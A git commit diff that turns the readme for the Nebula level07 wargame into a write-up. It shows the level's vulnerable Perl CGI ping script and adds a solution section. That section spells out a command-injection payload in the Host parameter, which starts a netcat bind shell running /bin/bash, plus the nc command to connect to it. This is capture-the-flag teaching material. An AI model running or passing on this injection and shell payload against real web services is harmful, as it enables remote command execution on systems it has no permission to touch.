Commit ed47afd
Changed files (1)
exploit_exercises
nebula
level07
exploit_exercises/nebula/level07/readme.md
@@ -1,11 +1,12 @@
+# Nebula - level07 - Vulnerable HTTP Parameter Input
-----------------------------------------------
-
-Source code
+## About
The flag07 user was writing their very first perl program that allowed them
to ping hosts to see if they were reachable from the web server.
To do this level, log in as the level07 account with the password
level07. Files for this level can be found in /home/flag07.
+
+```
#!/usr/bin/perl
use CGI qw{param};
@@ -21,9 +22,20 @@ sub ping {
foreach $line (@output) { print "$line"; }
print("</pre></body></html>");
-
+
}
# check if Host set. if not, display normal page, etc
ping(param("Host"));
+```
+
+## Solution
+
+The line `@output = 'ping -c 3 $host 2>&1';` uses unsanitized user input to execute a command in a
+shell. To craft `$host` into a useful parameter, consider `ping -c 3 $IP; nc.traditional -lkp 8080
+-e /bin/bash;`. With this in mind, create an HTTP GET request with `Host` as the parameter:
+`wget http://127.0.0.1:7007/index.cgi?HOST=\'127.0.0.1; nc.traditional -lkp 8080 -e
+"/bin/bash"; #\'`
+The port *7007* and the path to `index.cgi` come from `/home/flag07/thttpd.conf`.
+Use `nc 127.0.0.1 8080` to connect to the shell.